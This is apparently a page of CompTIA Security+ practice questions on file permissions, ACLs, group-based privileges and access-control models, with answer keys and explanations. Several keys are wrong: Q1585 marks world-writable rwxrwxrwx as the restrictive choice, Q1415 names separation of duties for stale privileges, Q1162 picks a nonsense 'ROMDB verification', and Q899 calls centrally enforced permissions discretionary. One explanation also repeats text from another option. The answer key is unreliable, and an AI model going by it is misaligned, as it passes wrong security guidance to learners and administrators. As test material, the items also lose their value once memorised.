CompTIA Security Plus Mock Test Q1585

During a Linux security audit at a local college, it was noted that members of the dean’s group were able to modify employee records in addition to modifying student records, resulting in an audit exception. The college security policy states that the dean’s group should only have the ability to modify student records. Assuming that the correct user and group ownerships are in place, which of the following sets of permissions should have been assigned to the directories containing the employee records?

A. R-x—rwx
B. Rwxrwxrwx
C. Rwx—-wx
D. Rwxrwxr—


Correct Answer: B
Section: Mixed Questions

CompTIA Security Plus Mock Test Q1415

A recent audit has revealed that several users have retained permissions to systems they should no longer have rights to after being promoted or changed job positions. Which of the following controls would BEST mitigate this issue?

A. Separation of duties
B. User account reviews
C. Group based privileges
D. Acceptable use policies

Correct Answer: A
Section: Mixed Questions

CompTIA Security Plus Mock Test Q1409

Ann, a security administrator at a call center, has been experiencing problems with users intentionally installing unapproved and occasionally malicious software on their computers. Due to the nature of their jobs, Ann cannot change their permissions. Which of the following would BEST alleviate her concerns?

A. Deploy a HIDS suite on the users’ computer to prevent application installation
B. Maintain the baseline posture at the highest OS patch level
C. Enable the pop-up blockers on the user’s browsers to prevent malware
D. Create an approved application list and block anything not on it

Correct Answer: D
Section: Mixed Questions

CompTIA Security Plus Mock Test Q1356

After installing a new Linux system the administrator runs a command that records the size, permissions, and MD5 sum of all the files on the system. Which of the following describes what the administrator is doing?

A. Identifying vulnerabilities
B. Design review
C. Host software baselining
D. Operating system hardening


Correct Answer: C
Section: Mixed Questions

CompTIA Security Plus Mock Test Q1226

The access control list (ACL) for a file on a server is as follows:
User: rwx
User: Ann: r- –
User: Joe: r- –
Group: rwx
Group: sales: r-x
Other: r-x
Joe and Ann are members of the Human Resources group. Will Ann and Joe be able to run the file?

A. No since Ann and Joe are members of the Sales group owner of the file
B. Yes since the regular permissions override the ACL for the file
C. No since the ACL overrides the regular permissions for the file
D. Yes since the regular permissions and the ACL combine to create the effective permissions on the file

Correct Answer: C
Section: Mixed Questions

CompTIA Security Plus Mock Test Q1162

The security administrator runs an rpm verify command which records the MD5 sum, permissions, and timestamp of each file on the system. The administrator saves this information to a separate server. Which of the following describes the procedure the administrator has performed?

A. Host software base-lining
B. File snapshot collection
C. TPM
D. ROMDB verification

Correct Answer: D
Section: Mixed Questions

CompTIA Security Plus Mock Test Q988

Ann is a member of the Sales group. She needs to collaborate with Joe, a member of the IT group, to edit a file. Currently, the file has the following permissions:
Ann: read/write
Sales Group: read
IT Group: no access
If a discretionary access control list is in place for the files owned by Ann, which of the following would be the BEST way to share the file with Joe?

A. Add Joe to the Sales group.
B. Have the system administrator give Joe full access to the file.
C. Give Joe the appropriate access to the file directly.
D. Remove Joe from the IT group and add him to the Sales group.


Correct Answer: C
Section: Access Control and Identity Management

Explanation:
Joe needs access to only one file. He also needs to ‘edit’ that file. Editing a file requires Read and Write access to the file. The best way to provide Joe with the minimum required
permissions to edit the file would be to give Joe the appropriate access to the file directly.

Incorrect Answers:
A: The Sales group only has read access to the file. Joe needs Read and Write access to the file. Adding Joe to the Sales group will not provide him with the required access to the
file. Therefore, this answer is incorrect.
B: Joe needs Read and Write access to the file; he does not need full access to the file. It is best practice from a security perspective to provide the minimum permissions required.
Therefore, this answer is incorrect.
D: Something to watch out for with these questions: ‘No access’ means the group has not been granted ‘or denied’ access to the file. “Access Denied” is different. It means access has
been explicitly denied. Access Denied would override all other access granted permissions.
The Sales group only has read access to the file. Joe needs Read and Write access to the file. Adding Joe to the Sales group will not provide him with the required access to the file.
Therefore, this answer is incorrect.

CompTIA Security Plus Mock Test Q979

A company has 5 users. Users 1, 2 and 3 need access to payroll and users 3, 4 and 5 need access to sales. Which of the following should be implemented to give the appropriate access while enforcing least privilege?

A. Assign individual permissions to users 1 and 2 for payroll. Assign individual permissions to users 4 and 5 for sales. Make user 3 an administrator.
B. Make all users administrators and then restrict users 1 and 2 from sales. Then restrict users 4 and 5 from payroll.
C. Create two additional generic accounts, one for payroll and one for sales that users utilize.
D. Create a sales group with users 3, 4 and 5. Create a payroll group with users 1, 2 and 3.


Correct Answer: D
Section: Access Control and Identity Management

Explanation:
Assigning permissions to a group requires less effort than assigning permissions to individual users. When you have groups configured with the appropriate permissions, you can grant
the permissions to individual users by adding the users to the groups. Users can be members of multiple groups and therefore have multiple sets of permissions assigned to them. In
this answer, user 3 is a member of both groups which grants the user permission to both Sales and Payroll.

Incorrect Answers:
A: Assign individual permissions to individual users requires a lot more administrative effort than assigning permissions to groups and adding the users to the groups. Therefore, this
answer is incorrect.
B: The question states that you must enforce least privilege. Granting the users administrator access gives them full access to everything. They could even remove the restrictions that
this answer suggests using. Therefore, this answer is incorrect.
C: Employees should not share user accounts. You should grant the appropriate permissions to the users’ user accounts (by way of group membership); not create additional accounts
for multiple users to use. Therefore, this answer is incorrect.

CompTIA Security Plus Mock Test Q972

A supervisor in the human resources department has been given additional job duties in the accounting department. Part of their new duties will be to check the daily balance sheet calculations on spreadsheets that are restricted to the accounting group. In which of the following ways should the account be handled?

A. The supervisor should be allowed to have access to the spreadsheet files, and their membership in the human resources group should be terminated.
B. The supervisor should be removed from the human resources group and added to the accounting group.
C. The supervisor should be added to the accounting group while maintaining their membership in the human resources group.
D. The supervisor should only maintain membership in the human resources group.

Correct Answer: C
Section: Access Control and Identity Management

Explanation:
You can assign permissions to access resources either to a user or a group. The most efficient way is to assign permissions to a group (group based privileges). By assigning the
human resources supervisor’s user account to the group means the supervisor will inherit the permissions of that group, and allow him to carry out the new duties. Because the new
duties are being added to his normal duties, maintaining membership in the human resources group will allow the supervisor to continue performing his normal duties.

Incorrect Answers:
A: Because the new duties are being added to his normal duties, terminating the supervisor’s membership in the human resources group will prevent the supervisor from carrying out
his normal duties as he will no longer have the required permissions.
B: Because the new duties are being added to his normal duties, removing the supervisor from the human resources group will prevent the supervisor from carrying out his normal
duties as he will no longer have the required permissions.
D: Maintaining the supervisor’s membership in the human resources group only, will prevent the supervisor from carrying out his additional duties in the accounting department as the
supervisor will not have the required permissions.

References:
Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, p. 294

CompTIA Security Plus Mock Test Q899

The IT department has setup a share point site to be used on the intranet. Security has established the groups and permissions on the site. No one may modify the permissions and all requests for access are centrally managed by the security team. This is an example of which of the following control types?

A. Rule based access control
B. Mandatory access control
C. User assigned privilege
D. Discretionary access control

Correct Answer: D
Section: Access Control and Identity Management

Explanation:
Discretionary access control (DAC) allows access to be granted or restricted by an object’s owner based on user identity and on the discretion of the object owner.

Incorrect Answers:
A: Rule-based access control is used for network devices that filter traffic based on filtering rules.
B: Mandatory Access Control allows access to be granted or restricted based on the rules of classification.
C: User assigned privilege is when permissions are allowed or refused based on a specific individual user.

References:
Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 278-284, 294